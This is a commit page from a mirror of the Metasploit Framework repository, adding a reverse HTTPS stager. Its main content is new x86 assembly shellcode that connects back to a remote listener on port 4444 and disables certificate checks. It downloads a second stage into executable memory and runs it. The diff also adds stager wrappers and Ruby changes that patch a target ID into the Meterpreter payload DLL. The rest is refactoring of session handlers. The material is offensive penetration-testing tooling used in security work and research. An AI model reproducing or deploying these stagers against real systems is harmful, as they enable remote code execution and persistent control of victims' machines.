infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Small patch to enable a new stager 

git-svn-id: file:///home/svn/framework3/trunk@8984 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2010-04-03 05:21:15 +00:00
parent 5d0fb434b7
commit c6c956ab46
43 changed files with 331 additions and 85 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/meterpreter/elevator.dll
View File

Binary file not shown.

BIN
data/meterpreter/elevator.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_espia.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_incognito.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_priv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.dll
View File

Binary file not shown.

BIN
data/meterpreter/metsrv.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.dll
View File

Binary file not shown.

BIN
data/meterpreter/screenshot.x64.dll
View File

Binary file not shown.

2
external/source/meterpreter/source/common/common.h vendored
View File

@ -32,7 +32,7 @@
#include "list.h"
//#define DEBUGTRACE
// #define DEBUGTRACE
#ifdef DEBUGTRACE
#define dprintf(...) real_dprintf(__VA_ARGS__)

38
external/source/meterpreter/source/extensions/stdapi/server/ui/desktop.c vendored
View File

@ -1,17 +1,17 @@
#include "precomp.h"
#include "./../sys/session.h"
#include "./../sys/process/ps.h"
typedef struct _DESKTOPLIST
{
DWORD dwSessionId;
char * cpStationName;
Packet * response;
typedef struct _DESKTOPLIST
{
DWORD dwSessionId;
char * cpStationName;
Packet * response;
} DESKTOPLIST, *LPDESKTOPLIST;
/*
* Callback function for EnumDesktops when listing desktops on a station during desktop_list().
*/
/*
* Callback function for EnumDesktops when listing desktops on a station during desktop_list().
*/
BOOL CALLBACK desktop_enumdesktops_callback( LPTSTR cpDesktopName, LPARAM lpParam )
{
DESKTOPLIST * dl = NULL;
@ -48,12 +48,12 @@ BOOL CALLBACK desktop_enumdesktops_callback( LPTSTR cpDesktopName, LPARAM lpPara
return TRUE;
}
/*
* Callback function for EnumWindowStations when listing stations during request_ui_desktop_enum().
/*
* Callback function for EnumWindowStations when listing stations during request_ui_desktop_enum().
*/
BOOL CALLBACK desktop_enumstations_callback( LPTSTR cpStationName, LPARAM param )
{
HWINSTA hWindowStation = NULL;
HWINSTA hWindowStation = NULL;
DESKTOPLIST dl = {0};
do
@ -68,11 +68,11 @@ BOOL CALLBACK desktop_enumstations_callback( LPTSTR cpStationName, LPARAM param
EnumDesktops( hWindowStation, desktop_enumdesktops_callback, (LPARAM)&dl );
} while( 0 );
if( hWindowStation )
CloseWindowStation( hWindowStation );
} while( 0 );
if( hWindowStation )
CloseWindowStation( hWindowStation );
return TRUE;
}
@ -217,8 +217,8 @@ DWORD request_ui_desktop_set( Remote * remote, Packet * request )
if( hDesktop )
CloseDesktop( hDesktop );
if( hWindowStation )
if( hWindowStation )
CloseWindowStation( hWindowStation );
if( hOrigWindowStation )

2
external/source/meterpreter/source/server/server_setup.c vendored
View File

@ -268,7 +268,7 @@ static BOOL server_negotiate_ssl(Remote *remote)
dprintf("[SERVER] Sending a HTTP GET request to the remote side...");
if( (ret = SSL_write(remote->ssl, "GET / HTTP/1.0\r\n\r\n", 18)) <= 0 )
if( (ret = SSL_write(remote->ssl, "GET /123456789 HTTP/1.0\r\n\r\n", 27)) <= 0 )
{
dprintf("[SERVER] SSL write failed during negotiation with return: %d (%d)", ret, SSL_get_error(remote->ssl, ret));
}

157
external/source/shellcode/windows/x86/src/block/block_reverse_https.asm vendored Normal file
View File

@ -0,0 +1,157 @@
;-----------------------------------------------------------------------------;
; Author: HD Moore
; Compatible: ?
; Version: 1.0
;-----------------------------------------------------------------------------;
[BITS 32]
; Input: EBP must be the address of 'api_call'.
; Output: EDI will be the socket for the connection to the server
; Clobbers: EAX, ESI, EDI, ESP will also be modified (-0x1A0)
load_wininet:
push 0x0074656e ; Push the bytes 'wininet',0 onto the stack.
push 0x696e6977 ; ...
mov esi, esp ; Save a pointer to wininet
push esp ; Push a pointer to the "wininet" string on the stack.
push 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
call ebp ; LoadLibraryA( "wininet" )
internetopen:
xor edi,edi
push edi ; DWORD dwFlags
push edi ; LPCTSTR lpszProxyBypass
push edi ; LPCTSTR lpszProxyName
push edi ; DWORD dwAccessType (PRECONFIG = 0)
push esi ; LPCTSTR lpszAgent
push 0xA779563A ; hash( "wininet.dll", "InternetOpenA" )
call ebp
mov esi, eax ; save the HINTERNET handle
jmp get_server_host
internetconnect:
pop ebx ; Save the hostname pointer
xor ecx, ecx
push ecx ; DWORD_PTR dwContext (NULL)
push ecx ; dwFlags
push byte 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
push ecx ; password
push ecx ; username
push dword 4444 ; PORT
push ebx ; HOSTNAME
push esi ; HINTERNET hInternet
push 0xC69F8957 ; hash( "wininet.dll", "InternetConnectA" )
call ebp
mov esi, eax ; hConnection
jmp get_server_uri
httpopenrequest:
pop ecx
xor edx, edx ; NULL
push edx ; dwContext (NULL)
push (0x80000000 | 0x04000000 | 0x00800000 | 0x00400000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00000200 ; INTERNET_FLAG_NO_UI
push edx ; accept types
push edx ; referrer
push edx ; version
push ecx ; url
push edx ; method
push esi ; hConnection
push 0x3B2E55EB ; hash( "wininet.dll", "HttpOpenRequestA" )
call ebp
mov esi, eax ; hHttpRequest
httpsendrequest:
xor eax, eax
push eax ; optional length
push eax ; optional
push eax ; dwHeadersLength
push eax ; headers
push esi ; hHttpRequest
push 0x7B18062D ; hash( "wininet.dll", "InternetCloseHandleA" )
call ebp
test eax,eax
jnz short allocate_memory
check_ssl:
; In the case of an invalid certificate authority, we have to wait until the error occurs,
; set an option to disable it, then try it all over again. This wastes shellcode space,
; but its required to use this payload without a valid signed cert.
push 0x5DE2C5AA ; hash( "kernel32.dll", "GetLastError" )
call ebp
cmp eax, 12045 ; ERROR_INTERNET_INVALID_CA
jne failure
; InternetSetOption (hReq, INTERNET_OPTION_SECURITY_FLAGS, &dwFlags, sizeof (dwFlags) );
set_security_options:
push 0x00003380
mov eax, esp
push 4 ; sizeof(dwFlags)
push eax ; &dwFlags
push byte 31 ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
push esi ; hRequest
push 0x869E4675 ; hash( "wininet.dll", "InternetSetOptionA" )
call ebp
pop eax ; clear temporary storage
; Try it again
jmp short httpsendrequest
failure:
push 0x56A2B5F0 ; hardcoded to exitprocess for size
call ebp
allocate_memory:
push byte 0x40 ; PAGE_EXECUTE_READWRITE
push 0x1000 ; MEM_COMMIT
push 0x00400000 ; Stage allocation (8Mb ought to do us)
push byte 0 ; NULL as we dont care where the allocation is.
push 0xE553A458 ; hash( "kernel32.dll", "VirtualAlloc" )
call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
download_prep:
xchg eax, ebx ; place the allocated base address in ebx
push ebx ; store a copy of the stage base address on the stack
push byte 0 ; temporary storage for bytes read count
mov edi, esp ; &bytesRead
download_more:
push edi ; &bytesRead
push 8192 ; 8k read
push ebx ; buffer
push esi ; hRequest
push 0xE2899612 ; hash( "wininet.dll", "InternetReadFile" )
call ebp
test eax,eax ; download failed?
jz failure
mov eax, [edi]
add ebx, eax ; buffer += bytes_received
test eax,eax
jnz download_more ; continue until it returns 0
pop eax ; clear the temporary storage
execute_stage:
ret ; dive into the stored stage address
get_server_uri:
call httpopenrequest
server_uri:
db "/123456789", 0x00
get_server_host:
call internetconnect
server_host:

19
external/source/shellcode/windows/x86/src/stager/stager_reverse_https.asm vendored Normal file
View File

@ -0,0 +1,19 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_https.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.

20
external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_dns_connect_only.asm vendored Normal file
View File

@ -0,0 +1,20 @@
;-----------------------------------------------------------------------------;
; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
; Version: 1.0 (24 July 2009)
; Size: 274 bytes
; Build: >build.py stager_reverse_tcp_nx
;-----------------------------------------------------------------------------;
[BITS 32]
[ORG 0]
cld ; Clear the direction flag.
call start ; Call start, this pushes the address of 'api_call' onto the stack.
%include "./src/block/block_api.asm"
start: ;
pop ebp ; pop off the address of 'api_call' for calling later.
%include "./src/block/block_reverse_tcp_dns.asm"
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
; This stager assumes the next stage is already in memory and working from EDI

6
lib/msf/base/sessions/meterpreter.rb
View File

@ -55,13 +55,13 @@ class Meterpreter < Rex::Post::Meterpreter::Client
# Initializes a meterpreter session instance using the supplied rstream
# that is to be used as the client's connection to the server.
#
def initialize(rstream)
def initialize(rstream, opts={})
super
#
# Initialize the meterpreter client
#
self.init_meterpreter(rstream)
self.init_meterpreter(rstream, opts)
#
# Create the console instance
@ -256,6 +256,8 @@ class Meterpreter < Rex::Post::Meterpreter::Client
attr_accessor :platform
attr_accessor :binary_suffix
attr_accessor :console # :nodoc:
attr_accessor :skip_ssl
attr_accessor :target_id
protected

3
lib/msf/base/sessions/meterpreter_x64_win.rb
View File

@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x64_Win < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x64/win64'
self.binary_suffix = 'x64.dll'
@ -18,3 +18,4 @@ end
end
end

3
lib/msf/base/sessions/meterpreter_x86_bsd.rb
View File

@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_BSD < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x86/bsd'
self.binary_suffix = 'bso'
@ -18,3 +18,4 @@ end
end
end

3
lib/msf/base/sessions/meterpreter_x86_linux.rb
View File

@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_Linux < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream, opts={})
super
self.platform = 'x86/linux'
self.binary_suffix = 'lso'
@ -18,3 +18,4 @@ end
end
end

3
lib/msf/base/sessions/meterpreter_x86_win.rb
View File

@ -9,7 +9,7 @@ module Sessions
#
###
class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
def initialize(rstream)
def initialize(rstream,opts={})
super
self.platform = 'x86/win32'
self.binary_suffix = 'dll'
@ -18,3 +18,4 @@ end
end
end

25
lib/msf/base/sessions/vncinject.rb
View File

@ -8,7 +8,7 @@ module Sessions
#
#
###
class VncInject
class VncInject
#
# The vncinject session is interactive
@ -20,7 +20,7 @@ class VncInject
# Initializes a vncinject session instance using the supplied rstream
# that is to be used as the client's connection to the server.
#
def initialize(rstream)
def initialize(rstream, opts={})
super
self.conn_eof = false
@ -84,7 +84,7 @@ class VncInject
def interactive?
false
end
##
#
# VNC Server specific interfaces
@ -107,7 +107,7 @@ class VncInject
'LocalHost' => host,
'Stream' => true,
'OnLocalConnection' => Proc.new {
if (self.got_conn == true)
nil
else
@ -117,17 +117,17 @@ class VncInject
end
},
'OnConnectionClose' => Proc.new {
if (self.conn_eof == false)
if (self.conn_eof == false)
print_status("VNC connection closed.")
self.conn_eof = true
# Closing time
self.view.kill if self.view
self.view = nil
self.kill
end
},
'__RelayType' => 'vncinject')
end
@ -141,10 +141,10 @@ class VncInject
# Launches VNC viewer against the local relay for this VNC server session.
#
def autovnc
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
vnc =
Rex::FileUtils::find_full_path('vncviewer') ||
Rex::FileUtils::find_full_path('vncviewer.exe')
if (vnc)
self.view = Thread.new {
system("vncviewer #{vlhost}::#{vlport}")
@ -165,4 +165,5 @@ protected
end
end
end
end

10
lib/msf/core/handler.rb
View File

@ -126,8 +126,8 @@ module Handler
# connections. The default behavior is to attempt to create a session for
# the payload. This path will not be taken for multi-staged payloads.
#
def handle_connection(conn)
create_session(conn)
def handle_connection(conn, opts={})
create_session(conn, opts)
end
#
@ -178,14 +178,14 @@ protected
# Sessions are only created if the payload that's been mixed in has an
# associated session.
#
def create_session(conn)
def create_session(conn, opts={})
# If there is a parent payload, then use that in preference.
return parent_payload.create_session(conn) if (parent_payload)
return parent_payload.create_session(conn, opts) if (parent_payload)
# If the payload we merged in with has an associated session factory,
# allocate a new session.
if (self.session)
s = self.session.new(conn)
s = self.session.new(conn, opts)
# Pass along the framework context
s.framework = framework

5
lib/msf/core/handler/bind_tcp.rb.ut.rb
View File

@ -14,7 +14,7 @@ class Handler::BindTcp::UnitTest < Test::Unit::TestCase
end
module Foo
def handle_connection(client)
def handle_connection(client, opts={})
self.success = 1
end
@ -48,4 +48,5 @@ class Handler::BindTcp::UnitTest < Test::Unit::TestCase
end
end
end

15
lib/msf/core/handler/find_port.rb
View File

@ -45,12 +45,12 @@ module FindPort
#
def handler(sock)
return if not sock
_find_prefix(sock)
# Flush the receive buffer
sock.get_once(-1, 1)
# If this is a multi-stage payload, then we just need to blindly
# transmit the stage and create the session, hoping that it works.
if (self.payload_type != Msf::Payload::Type::Single)
@ -83,12 +83,12 @@ protected
# Wrapper to create session that makes sure we actually have a session to
# create...
#
def create_session(sock)
def create_session(sock, opts={})
go = true
# Give the payload a chance to run
Rex::ThreadSafe.sleep(1.5)
# This is a hack. If the session is a shell, we check to see if it's
# functional by sending an echo which tells us whether or not we're good
# to go.
@ -100,8 +100,8 @@ protected
# If we're good to go, create the session.
rv = (go == true) ? super : nil
if (rv)
self._handler_return_value = Claimed
end
@ -117,7 +117,7 @@ protected
ebuf = Rex::Text.rand_text_alphanumeric(16)
# Send any identifying information that the find sock may need on
# the other side, such as a tag. If we do actually send something,
# the other side, such as a tag. If we do actually send something,
# wait a bit longer to let the remote side find us.
if (_send_id(sock))
Rex::ThreadSafe.sleep(1.5)
@ -147,3 +147,4 @@ end
end
end

9
lib/msf/core/handler/reverse_tcp.rb.ut.rb
View File

@ -15,7 +15,7 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
end
module Foo
def handle_connection(client)
def handle_connection(client, opts={})
self.success = 1
end
@ -43,9 +43,9 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
begin
Rex::ThreadSafe.sleep(1)
assert_equal(1, h.success)
h.success = 0
ensure
t.close
@ -59,4 +59,5 @@ class Handler::ReverseTcp::UnitTest < Test::Unit::TestCase
end
end
end

2
lib/msf/core/module.rb
View File

@ -616,7 +616,7 @@ protected
#
# The list of options that support merging in an information hash.
#
UpdateableOptions = [ "Name", "Description", "Alias" ]
UpdateableOptions = [ "Name", "Description", "Alias", "PayloadCompat" ]
#
# Sets the modules unsupplied info fields to their default values.

5
lib/msf/core/payload/osx/bundleinject.rb
View File

@ -15,7 +15,7 @@ module Payload::Osx::BundleInject
'Name' => 'Mac OS X Inject Mach-O Bundle',
'Version' => '$Revision$',
'Description' => 'Inject a custom Mach-O bundle into the exploited process',
'Author' =>
'Author' =>
[
'ddz',
],
@ -69,7 +69,7 @@ module Payload::Osx::BundleInject
# Transmits the DLL injection payload and its associated DLL to the remote
# computer so that it can be loaded into memory.
#
def handle_connection_stage(conn)
def handle_connection_stage(conn, opts={})
data = ""
begin
@ -98,3 +98,4 @@ module Payload::Osx::BundleInject
end
end
end

13
lib/msf/core/payload/stager.rb
View File

@ -18,7 +18,7 @@ module Msf::Payload::Stager
# Return the stager payload's raw payload.
#
def payload
return module_info['Stager']['Payload']
return module_info['Stager']['Payload']
end
#
@ -83,7 +83,7 @@ module Msf::Payload::Stager
#
# Transmit the associated stage.
#
def handle_connection(conn)
def handle_connection(conn, opts={})
# If the stage should be sent over the client connection that is
# established (which is the default), then go ahead and transmit it.
if (stage_over_connection?)
@ -123,7 +123,7 @@ module Msf::Payload::Stager
end
# Give the stages a chance to handle the connection
handle_connection_stage(conn)
handle_connection_stage(conn, opts)
end
#
@ -131,8 +131,8 @@ module Msf::Payload::Stager
# whatever it is it needs to process. The default is to simply attempt to
# create a session.
#
def handle_connection_stage(conn)
create_session(conn)
def handle_connection_stage(conn, opts={})
create_session(conn, opts={})
end
#
@ -152,7 +152,7 @@ module Msf::Payload::Stager
# Generate an encoded version of the stage. We tell the encoding system
# to save edi to ensure that it does not get clobbered.
encp = Msf::EncodedPayload.create(
self,
self,
'Raw' => stg,
'SaveRegisters' => ['edi'],
'ForceEncode' => true)
@ -172,3 +172,4 @@ module Msf::Payload::Stager
attr_accessor :stage_prefix
end

4
lib/msf/core/payload/windows/dllinject.rb
View File

@ -27,7 +27,7 @@ module Payload::Windows::DllInject
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi -passivex',
'Convention' => 'sockedi -passivex -https'
},
'Stage' =>
{
@ -203,7 +203,7 @@ module Payload::Windows::DllInject
# Transmits the DLL injection payload and its associated DLL to the remote
# computer so that it can be loaded into memory.
#
def handle_connection_stage(conn)
def handle_connection_stage(conn, opts = {})
data = library_name + "\x00"
begin

5
lib/msf/core/payload/windows/exec.rb
View File

@ -24,6 +24,10 @@ module Payload::Windows::Exec
'License' => MSF_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => '-passivex -https',
},
'Payload' =>
{
'Offsets' =>
@ -70,3 +74,4 @@ module Payload::Windows::Exec
end
end

16
lib/msf/core/payload/windows/reflectivedllinject.rb
View File

@ -27,7 +27,7 @@ module Payload::Windows::ReflectiveDllInject
'Arch' => ARCH_X86,
'PayloadCompat' =>
{
'Convention' => 'sockedi',
'Convention' => 'sockedi -https',
},
'Stage' =>
{
@ -46,7 +46,7 @@ module Payload::Windows::ReflectiveDllInject
datastore['DLL']
end
def stage_payload
def stage_payload(target_id=nil)
dll = ""
offset = 0
@ -99,6 +99,18 @@ module Payload::Windows::ReflectiveDllInject
# patch the bootstrap code into the dll's DOS header...
dll[ 0, bootstrap.length ] = bootstrap
# patch the target ID into the URI if specified
if target_id
i = dll.index("/123456789 HTTP/1.0\r\n\r\n\x00")
if i
t = target_id.to_s
raise "Target ID must be less than 9 bytes" if t.length > 8
u = "/B#{t} HTTP/1.0\r\n\r\n\x00"
print_status("Patching Target ID #{t} into DLL")
dll[i, u.length] = u
end
end
# return our stage to be loaded by the intermediate stager
return dll
end

2
lib/msf/core/session/interactive.rb
View File

@ -20,7 +20,7 @@ module Interactive
#
# Initializes the session.
#
def initialize(rstream)
def initialize(rstream, opts={})
self.rstream = rstream
super()
end

30
lib/rex/post/meterpreter/client.rb
View File

@ -60,8 +60,8 @@ class Client
# Initializes the client context with the supplied socket through
# which communication with the server will be performed.
#
def initialize(sock, to = self.class.default_timeout)
init_meterpreter(sock, to)
def initialize(sock,opts={})
init_meterpreter(sock, opts)
end
#
@ -74,17 +74,22 @@ class Client
#
# Initializes the meterpreter client instance
#
def init_meterpreter(sock, to = self.class.default_timeout)
def init_meterpreter(sock,opts={})
self.sock = sock
self.parser = PacketParser.new
self.ext = ObjectAliases.new
self.ext_aliases = ObjectAliases.new
self.response_timeout = to
self.send_keepalives = true
self.alive = true
self.target_id = opts[:target_id]
# Switch the socket to SSL mode
swap_sock_plain_to_ssl()
self.response_timeout = opts[:timeout] || self.class.default_timeout
self.send_keepalives = true
# Switch the socket to SSL mode and receive the hello if needed
if not opts[:skip_ssl]
swap_sock_plain_to_ssl()
end
register_extension_alias('core', ClientCore.new(self))
@ -108,9 +113,9 @@ class Client
self.sock.sslsock = ssl
self.sock.sslctx = ctx
tag = self.sock.read(18)
if(not tag or tag != "GET / HTTP/1.0\r\n\r\n")
raise RuntimeError, "Could not read the SSL hello tag"
tag = self.sock.get_once(-1, 30)
if(not tag or tag !~ /^GET \//)
raise RuntimeError, "Could not read the HTTP hello token"
end
end
@ -316,6 +321,11 @@ class Client
# this will be false
#
attr_accessor :alive
#
# The unique target identifier for this payload
#
attr_accessor :target_id
protected
attr_accessor :parser, :ext_aliases # :nodoc:
attr_writer :ext, :sock # :nodoc:

5
modules/payloads/stages/windows/meterpreter.rb
View File

@ -31,6 +31,10 @@ module Metasploit3
'Version' => '$Revision$',
'Description' => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)',
'Author' => ['skape','sf'],
'PayloadCompat' =>
{
'Convention' => 'sockedi',
},
'License' => MSF_LICENSE,
'Session' => Msf::Sessions::Meterpreter_x86_Win))
@ -44,3 +48,4 @@ module Metasploit3
end
end

3
modules/payloads/stages/windows/shell.rb
View File

@ -30,7 +30,7 @@ module Metasploit3
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockedi'
'Convention' => 'sockedi -https'
},
'Stage' =>
{
@ -59,3 +59,4 @@ module Metasploit3
end
end

5
modules/payloads/stages/windows/upexec.rb
View File

@ -28,6 +28,10 @@ module Metasploit3
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'sockedi -https'
},
'Stage' =>
{
'Offsets' =>
@ -99,3 +103,4 @@ module Metasploit3
end
end

6
modules/payloads/stages/windows/vncinject.rb
View File

@ -12,7 +12,7 @@ require 'msf/base/sessions/vncinject'
module Metasploit3
include Msf::Payload::Windows::ReflectiveDllInject
def initialize(info = {})
super(update_info(info,
'Name' => 'VNC Server (Reflective Injection)',
@ -20,7 +20,7 @@ module Metasploit3
'Description' => 'Inject a VNC Dll via a reflective loader (staged)',
'Author' => [ 'sf' ],
'Session' => Msf::Sessions::VncInject ))
# Override the DLL path with the path to the meterpreter server DLL
register_options(
@ -95,7 +95,7 @@ module Metasploit3
print_status("Launched vnciewer in the background.")
end
end
super
end